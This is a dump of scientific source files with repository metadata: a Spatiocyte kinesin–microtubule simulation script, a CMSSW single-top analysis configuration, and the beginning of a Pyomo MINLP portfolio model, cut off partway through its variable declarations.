v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP' ]]
v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF' ]]
v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP' ]]
v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP']]
#v.VariableReferenceList = [['_', 'Variable:/Soma/Surface:VACANT']]
#v.VariableReferenceList = [['_', 'Variable:/Soma/Membrane:PlusSensor']]
#v.VariableReferenceList = [['_', 'Variable:/Soma/Membrane:MinusSensor']]
v.LogInterval = 10
#Populate-----------------------------------------------------------------------
#p = sim.createEntity('MoleculePopulateProcess', 'Process:/Soma:pPlusSensor')
#p.VariableReferenceList = [['_', 'Variable:/Soma/Membrane:PlusSensor']]
#p.EdgeX = 1
#
#p = sim.createEntity('MoleculePopulateProcess', 'Process:/Soma:pMinusSensor')
#p.VariableReferenceList = [['_', 'Variable:/Soma/Membrane:MinusSensor']]
#p.EdgeX = -1
p = sim.createEntity('MoleculePopulateProcess', 'Process:/Soma:pTUB_KIF')
p.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF']]
#p = sim.createEntity('MoleculePopulateProcess', 'Process:/Soma:pTUB_GTP')
#p.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP']]
#p.LengthBinFractions = [1, 0.3, 0.8]
#p.Priority = 100 #set high priority for accurate fraction
p = sim.createEntity('MoleculePopulateProcess', 'Process:/Soma:pKIF')
p.VariableReferenceList = [['_', 'Variable:/Soma:KIF']]
#-------------------------------------------------------------------------------
#Cytosolic KIF recruitment to microtubule---------------------------------------
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:b1')
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','1']]
r.p = 0.0001
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:b2')
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','1']]
r.p = 0
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:b3')
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:aTUB','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','1']]
r.p = 0.9
#-------------------------------------------------------------------------------
#MT KIF detachment to cytosol---------------------------------------------------
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:detach')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:aTUB','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','1']]
r.SearchVacant = 1
r.k = 15
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:detachGTP')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','1']]
r.SearchVacant = 1
r.k = 15
#-------------------------------------------------------------------------------
#Active tubulin inactivation----------------------------------------------------
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:i1')
r.VariableReferenceList = [['_', 'Variable:/Soma:aTUB','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','1']]
r.k = 0.055
#-------------------------------------------------------------------------------
#MT KIF detachment to cytosol at plus end---------------------------------------
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:p1')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','1']]
r.p = pPlusEnd_Detach
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:p2')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','1']]
r.p = pPlusEnd_Detach
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:p3')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','1']]
r.p = pPlusEnd_Detach
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:p4')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:KIF','1']]
r.p = pPlusEnd_Detach
#-------------------------------------------------------------------------------
#KIF ATP hydrolysis-------------------------------------------------------------
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:h1')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','1']]
r.SearchVacant = 1
r.k = 100
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:h2')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','1']]
r.SearchVacant = 1
r.k = 100
#-------------------------------------------------------------------------------
#KIF ADP phosphorylation--------------------------------------------------------
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:phos1')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','1']]
r.SearchVacant = 1
r.k = 145
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:phos2')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP','1']]
r.SearchVacant = 1
r.k = 145
#-------------------------------------------------------------------------------
#KIF ratchet biased walk_-------------------------------------------------------
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:rat1')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:aTUB','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','0']] #If BindingSite[1]==TUB
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','1']] #option 1
r.VariableReferenceList = [['_', 'Variable:/Soma:aTUB','0']] #Elif BindingSite[1]==TUB_GTP
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','1']] #option 2
r.BindingSite = 1
r.k = 55
#r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:rat1')
#r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','-1']]
#r.VariableReferenceList = [['_', 'Variable:/Soma:aTUB','1']]
#r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','0']] #If BindingSite[1]==TUB
#r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','1']] #option 1
#r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','0']] #Elif BindingSite[1]==TUB_GTP
#r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP','1']] #option 2
#r.BindingSite = 1
#r.k = 55
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:rat2')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','-1']] #A
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','1']] #C
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','0']] #E
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','1']] #D
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','0']] #H
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP','1']] #F
r.BindingSite = 1
r.k = 55
#-------------------------------------------------------------------------------
#KIF random walk between GTP and GDP tubulins-----------------------------------
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:w1')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','1']]
r.ForcedSequence = 1
r.p = 1
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:w2')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','1']]
r.ForcedSequence = 1
r.p = 1
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:w3')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','1']]
r.ForcedSequence = 1
r.p = 1
#-------------------------------------------------------------------------------
#KIF normal diffusion-----------------------------------------------------------
d = sim.createEntity('DiffusionProcess', 'Process:/Soma:dKIF')
d.VariableReferenceList = [['_', 'Variable:/Soma:KIF']]
d.D = 0.5e-12
d = sim.createEntity('DiffusionProcess', 'Process:/Soma:dTUB_KIF')
d.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF']]
d.VariableReferenceList = [['_', 'Variable:/Soma:aTUB', '1']]
d.D = 0.04e-12
d = sim.createEntity('DiffusionProcess', 'Process:/Soma:dTUB_GTP_KIF')
d.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF']]
d.WalkReact = 1
d.D = 0.04e-12
#-------------------------------------------------------------------------------
run(T)
| [
"[email protected]"
] | |
774b67059eddcf1cedf719cb61af7c2ced0de7fa | 8ecf4930f9aa90c35e5199d117068b64a8d779dd | /TopQuarkAnalysis/SingleTop/test/crabs44/SingleTopMC_TTBarQ2upFall11_cfg.py | da0b2fabbd1a6100f2c5fce7261928493357cfcf | [] | no_license | fabozzi/ST_44 | 178bd0829b1aff9d299528ba8e85dc7b7e8dd216 | 0becb8866a7c758d515e70ba0b90c99f6556fef3 | refs/heads/master | 2021-01-20T23:27:07.398661 | 2014-04-14T15:12:32 | 2014-04-14T15:12:32 | 18,765,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,424 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("SingleTop")
ChannelName = "TTBarQ2up";
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.options = cms.untracked.PSet(
wantSummary = cms.untracked.bool(True),
FailPath = cms.untracked.vstring('ProductNotFound','Type Mismatch')
)
process.MessageLogger.cerr.FwkReport.reportEvery = 1000
#from PhysicsTools.PatAlgos.tools.cmsswVersionTools import run36xOn35xInput
# conditions ------------------------------------------------------------------
print "test "
#process.load("Configuration.StandardSequences.MixingNoPileUp_cff")
process.load("Configuration.StandardSequences.Geometry_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff") ### real data
#process.GlobalTag.globaltag = cms.string('START42_V17::All')
process.GlobalTag.globaltag = cms.string('START44_V13::All')
#from Configuration.PyReleaseValidation.autoCond import autoCond
#process.GlobalTag.globaltag = autoCond['startup']
process.load("TopQuarkAnalysis.SingleTop.SingleTopSequences_cff")
process.load("SelectionCuts_Skim_cff");################<----------
#From <<ysicsTools.PatAlgos.tools.cmsswVersionTools import *
#larlaun42xOn3yzMcInput(process)
#run36xOn35xInput(process)
# Get a list of good primary vertices, in 42x, these are DAF vertices
from PhysicsTools.SelectorUtils.pvSelector_cfi import pvSelector
process.goodOfflinePrimaryVertices = cms.EDFilter(
"PrimaryVertexObjectFilter",
filterParams = pvSelector.clone( minNdof = cms.double(4.0), maxZ = cms.double(24.0) ),
src=cms.InputTag('offlinePrimaryVertices')
)
# require physics declared
process.load('HLTrigger.special.hltPhysicsDeclared_cfi')
process.hltPhysicsDeclared.L1GtReadoutRecordTag = 'gtDigis'
#dummy output
process.out = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string('dummy.root'),
outputCommands = cms.untracked.vstring(""),
)
#rocess.load("PhysicsTools.HepMCCandAlgos.flavorHistoryPaths_cfi")
#mytrigs=["HLT_Mu9"]
mytrigs=["*"]
from HLTrigger.HLTfilters.hltHighLevel_cfi import *
#if mytrigs is not None :
# process.hltSelection = hltHighLevel.clone(TriggerResultsTag = 'TriggerResults::HLT', HLTPaths = mytrigs)
# process.hltSelection.throw = False
#
# getattr(process,"pfNoElectron"+postfix)*process.kt6PFJets
# set the dB to the beamspot
process.patMuons.usePV = cms.bool(False)
process.patElectrons.usePV = cms.bool(False)
#inputJetCorrLabel = ('AK5PFchs', ['L1FastJet', 'L2Relative', 'L3Absolute'])
# Configure PAT to use PF2PAT instead of AOD sources
# this function will modify the PAT sequences. It is currently
# not possible to run PF2PAT+PAT and standart PAT at the same time
from PhysicsTools.PatAlgos.tools.pfTools import *
from PhysicsTools.PatAlgos.tools.trigTools import *
postfix = ""
#usePF2PAT(process,runPF2PAT=True, jetAlgo='AK5', runOnMC=True, postfix=postfix, jetCorrections = inputJetCorrLabel)
usePF2PAT(process,runPF2PAT=True, jetAlgo='AK5', runOnMC=True, postfix=postfix)
switchOnTriggerMatchEmbedding(process,triggerMatchers = ['PatJetTriggerMatchHLTIsoMuBTagIP','PatJetTriggerMatchHLTIsoEleBTagIP'])
process.pfPileUp.Enable = True
process.pfPileUp.checkClosestZVertex = cms.bool(False)
process.pfPileUp.Vertices = cms.InputTag('goodOfflinePrimaryVertices')
process.pfJets.doAreaFastjet = True
process.pfJets.doRhoFastjet = False
#process.pfJets.Rho_EtaMax = cms.double(4.4)
#Compute the mean pt per unit area (rho) from the
#PFchs inputs
from RecoJets.JetProducers.kt4PFJets_cfi import kt4PFJets
process.kt6PFJets = kt4PFJets.clone(
rParam = cms.double(0.6),
src = cms.InputTag('pfNoElectron'+postfix),
doAreaFastjet = cms.bool(True),
doRhoFastjet = cms.bool(True),
# voronoiRfact = cms.double(0.9),
# Rho_EtaMax = cms.double(4.4)
)
process.patJetCorrFactors.rho = cms.InputTag("kt6PFJets", "rho")
coneOpening = cms.double(0.4)
defaultIsolationCut = cms.double(0.2)
#coneOpening = process.coneOpening
#defaultIsolationCut = process.coneOpening
#Muons
#applyPostfix(process,"isoValMuonWithNeutral",postfix).deposits[0].deltaR = coneOpening
#applyPostfix(process,"isoValMuonWithCharged",postfix).deposits[0].deltaR = coneOpening
#applyPostfix(process,"isoValMuonWithPhotons",postfix).deposits[0].deltaR = coneOpening
#electrons
#applyPostfix(process,"isoValElectronWithNeutral",postfix).deposits[0].deltaR = coneOpening
#applyPostfix(process,"isoValElectronWithCharged",postfix).deposits[0].deltaR = coneOpening
#applyPostfix(process,"isoValElectronWithPhotons",postfix).deposits[0].deltaR = coneOpening
applyPostfix(process,"pfIsolatedMuons",postfix).combinedIsolationCut = defaultIsolationCut
applyPostfix(process,"pfIsolatedElectrons",postfix).combinedIsolationCut = defaultIsolationCut
#applyPostfix(process,"pfIsolatedMuons",postfix).combinedIsolationCut = cms.double(0.125)
#applyPostfix(process,"pfIsolatedElectrons",postfix).combinedIsolationCut = cms.double(0.125)
#postfixQCD = "ZeroIso"
# Add the PV selector and KT6 producer to the sequence
getattr(process,"patPF2PATSequence"+postfix).replace(
getattr(process,"pfNoElectron"+postfix),
getattr(process,"pfNoElectron"+postfix)*process.kt6PFJets )
#Residuals (Data)
#process.patPFJetMETtype1p2Corr.jetCorrLabel = 'L2L3Residual'
process.patseq = cms.Sequence(
# process.patElectronIDs +
process.goodOfflinePrimaryVertices *
process.patElectronIDs *
getattr(process,"patPF2PATSequence"+postfix) #*
# process.producePatPFMETCorrections
# getattr(process,"patPF2PATSequence"+postfixQCD)
)
process.pfIsolatedMuonsZeroIso = process.pfIsolatedMuons.clone(combinedIsolationCut = cms.double(float("inf")))
process.patMuonsZeroIso = process.patMuons.clone(pfMuonSource = cms.InputTag("pfIsolatedMuonsZeroIso"), genParticleMatch = cms.InputTag("muonMatchZeroIso"))
# use pf isolation, but do not change matching
tmp = process.muonMatch.src
adaptPFMuons(process, process.patMuonsZeroIso, "")
process.muonMatch.src = tmp
process.muonMatchZeroIso = process.muonMatch.clone(src = cms.InputTag("pfIsolatedMuonsZeroIso"))
process.pfIsolatedElectronsZeroIso = process.pfIsolatedElectrons.clone(combinedIsolationCut = cms.double(float("inf")))
process.patElectronsZeroIso = process.patElectrons.clone(pfElectronSource = cms.InputTag("pfIsolatedElectronsZeroIso"))
#####################
#Adaptpfelectrons (process, process.patElectronsZeroIso, "")
#Add the PF type 1 corrections to MET
#process.load("PhysicsTools.PatUtils.patPFMETCorrections_cff")
#process.selectedPatJetsForMETtype1p2Corr.src = cms.InputTag('selectedPatJets')
#process.selectedPatJetsForMETtype2Corr.src = cms.InputTag('selectedPatJets')
#process.patPFJetMETtype1p2Corr.type1JetPtThreshold = cms.double(10.0)
#process.patPFJetMETtype1p2Corr.skipEM = cms.bool(False)
#process.patPFJetMETtype1p2Corr.skipMuons = cms.bool(False)
#process.patPF2PATSequence.remove(process.patPF2PATSequence.FastjetJetProducer)
process.pathPreselection = cms.Path(
process.patseq #+ process.producePatPFMETCorrections
)
process.ZeroIsoLeptonSequence = cms.Path(
process.pfIsolatedMuonsZeroIso +
process.muonMatchZeroIso +
process.patMuonsZeroIso +
process.pfIsolatedElectronsZeroIso +
process.patElectronsZeroIso
)
#process.looseLeptonSequence.remove(process.muonMatchLoose)
#getattr(process,"pfNoPileUp"+postfix).enable = True
#getattr(process,"pfNoMuon"+postfix).enable = True
#getattr(process,"pfNoElectron"+postfix).enable = True
#getattr(process,"pfNoTau"+postfix).enable = False
#Getattr (process,"pfNoJet"+postfix).enable = True
process.pfNoTau.enable = False
#process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1000) )
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
process.source = cms.Source ("PoolSource",
fileNames = cms.untracked.vstring (
#'file:/tmp/oiorio/F81B1889-AF4B-DF11-85D3-001A64789DF4.root'
#'file:/tmp/oiorio/EC0EE286-FA55-E011-B99B-003048F024F6.root'
#'file:/tmp/oiorio/D0B32FD9-6D87-E011-8572-003048678098.root'
#'file:/tmp/oiorio/149E3017-B799-E011-9FA9-003048F118C2.root'
#'file:/tmp/oiorio/FE4EF257-A3AB-E011-9698-00304867915A.root',
#'file:/tmp/oiorio/50A31B1A-8AAB-E011-835B-0026189438F5.root'
#'file:/tmp/oiorio/TTJetsLocalFall11.root',
#'file:/tmp/oiorio/',
#'file:/tmp/oiorio/00012F91-72E5-DF11-A763-00261834B5F1.root',
#'/store/mc/Fall11/T_TuneZ2_t-channel_7TeV-powheg-tauola/AODSIM/PU_S6_START44_V9B-v1/0000/CA7C6394-CE32-E111-9125-003048FFD796.root'
#'/store/mc/Fall11/Tbar_TuneZ2_t-channel_7TeV-powheg-tauola/AODSIM/PU_S6_START44_V9B-v1/0000/B81B1A7D-6E2A-E111-A1C1-0018F3D096EC.root'
#'/store/mc/Fall11/T_TuneZ2_t-channel_7TeV-powheg-tauola/AODSIM/PU_S6_START44_V9B-v1/0000/DE6B0050-3133-E111-B437-003048FFD736.root'
#'/store/mc/Fall11/T_TuneZ2_s-channel_7TeV-powheg-tauola/AODSIM/PU_S6_START44_V9B-v1/0000/440369A6-A23C-E111-9B5B-E0CB4E19F9AF.root'
#'file:/afs/cern.ch/work/m/mmerola/FC1035C0-2E32-E111-86D1-001A92971BD6_tchannelFall11_44X.root'
),
#eventsToProcess = cms.untracked.VEventRange('1:2807840-1:2807840'),
duplicateCheckMode = cms.untracked.string('noDuplicateCheck')
)
#process.TFileService = cms.Service("TFileService", fileName = cms.string("/tmp/oiorio/"+ChannelName+"_pt_bmode.root"))
process.TFileService = cms.Service("TFileService", fileName = cms.string("pileupdistr_"+ChannelName+".root"))
process.pileUpDumper = cms.EDAnalyzer("SingleTopPileUpDumper",
channel = cms.string(ChannelName),
)
#process.WLightFilter = process.flavorHistoryFilter.clone(pathToSelect = cms.int32(11))
#process.WccFlter = process.flavorHistoryFilter.clone(pathToSelect = cms.int32(6))
#process.WbbFilter = process.flavorHistoryFilter.clone(pathToSelect = cms.int32(5))
#process.hltFilter.TriggerResultsTag = cms.InputTag("TriggerResults","","REDIGI38X")
#process.hltFilter.TriggerResultsTag = cms.InputTag("TriggerResults","","REDIGI37X")
#process.hltFilter.TriggerResultsTag = cms.InputTag("TriggerResults","","REDIGI")
#process.hltFilter.TriggerResultsTag = cms.InputTag("TriggerResults","","REDIGI311X")
#process.hltFilter.TriggerResultsTag = cms.InputTag("TriggerResults","","HLT")
process.hltFilter.TriggerResultsTag = cms.InputTag("TriggerResults","","HLT")
process.hltFilter.HLTPaths = mytrigs
process.countLeptons.doQCD = cms.untracked.bool(False)
process.baseLeptonSequence = cms.Path(
# process.pileUpDumper +
process.basePath
)
process.selection = cms.Path (
process.preselection +
process.nTuplesSkim
)
from TopQuarkAnalysis.SingleTop.SingleTopNtuplizers_cff import saveNTuplesSkimLoose
from TopQuarkAnalysis.SingleTop.SingleTopNtuplizers_cff import saveNTuplesSkimMu
savePatTupleSkimLoose = cms.untracked.vstring(
'drop *',
'keep patMuons_selectedPatMuons_*_*',
'keep patElectrons_selectedPatElectrons_*_*',
'keep patJets_selectedPatJets_*_*',
'keep patMETs_patMETs_*_*',
'keep *_patPFMet_*_*',
'keep *_patType1CorrectedPFMet_*_*',
'keep *_PVFilterProducer_*_*',
'keep patJets_selectedPatJetsTriggerMatch_*_*',
"keep *_TriggerResults_*_*",#Trigger results
"keep *_PatJetTriggerMatchHLTIsoMuBTagIP_*_*",#Trigger matches
"keep *_patTrigger_*_*",
"keep *_patTriggerEvent_*_*",
'keep *_pfJets_*_*',
'keep patJets_topJetsPF_*_*',
'keep patMuons_looseMuons_*_*',
'keep patElectrons_looseElectrons_*_*',
'keep patMuons_tightMuons_*_*',
'keep patElectrons_tightElectrons_*_*',
'keep *_PDFInfo_*_*',
'keep *_patElectronsZeroIso_*_*',
'keep *_patMuonsZeroIso_*_*',
'keep *_PVFilterProducer_*_*',
'keep *_cFlavorHistoryProducer_*_*',
'keep *_bFlavorHistoryProducer_*_*',
)
## Output module configuration
process.singleTopNTuple = cms.OutputModule("PoolOutputModule",
# fileName = cms.untracked.string('rfio:/CST/cern.ch/user/o/oiorio/SingleTop/SubSkims/WControlSamples1.root'),
# fileName = cms.untracked.Bstring('/tmp/oiorio/edmntuple_tchannel_big.root'),
# fileName = cms.untracked.string('/tmp/oiorio/edmntuple_'+ChannelName+'.root'),
fileName = cms.untracked.string('edmntuple_'+ChannelName+'.root'),
SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring('selection')),
outputCommands = saveNTuplesSkimLoose,
)
process.singleTopPatTuple = cms.OutputModule("PoolOutputModule",
# fileName = cms.untracked.string('rfio:/CST/cern.ch/user/o/oiorio/SingleTop/SubSkims/WControlSamples1.root'),
fileName = cms.untracked.string('pattuple_'+ChannelName+'.root'),
SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring('selection')),
outputCommands = savePatTupleSkimLoose
)
process.singleTopNTuple.dropMetaData = cms.untracked.string("ALL")
process.outpath = cms.EndPath(
process.singleTopNTuple #+
# process.singleTopPatTuple
)
| [
"[email protected]"
] | |
90bb35f751c04a00431dcc41c19d92be007cb65d | 731a33f8bb92bad31ab233416d8ef6eb3a9f3fe0 | /minlplib_instances/smallinvSNPr2b020-022.py | 8348bb9863905664e9dffb15877a5b89b31156af | [] | no_license | ChristophNeumann/IPCP | d34c7ec3730a5d0dcf3ec14f023d4b90536c1e31 | 6e3d14cc9ed43f3c4f6c070ebbce21da5a059cb7 | refs/heads/main | 2023-02-22T09:54:39.412086 | 2021-01-27T17:30:50 | 2021-01-27T17:30:50 | 319,694,028 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 167,363 | py | # MINLP written by GAMS Convert at 02/15/18 11:44:29
#
# Equation counts
# Total E G L N X C B
# 4 0 2 2 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 101 1 0 100 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 401 301 100 0
from pyomo.environ import *
model = m = ConcreteModel()
m.i1 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i2 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i3 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i4 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i5 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i6 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i7 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i8 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i9 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i10 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i11 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i12 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i13 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i14 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i15 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i16 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i17 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i18 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i19 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i20 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i21 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i22 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i23 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i24 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i25 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i26 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i27 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i28 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i29 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i30 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i31 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i32 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i33 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i34 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i35 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i36 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i37 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i38 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i39 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i40 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i41 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i42 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i43 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i44 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i45 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i46 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i47 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i48 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i49 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i50 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i51 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i52 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i53 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i54 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i55 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i56 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i57 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i58 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i59 = Var(within=Integers,bounds=(0,1E20),initialize=0)
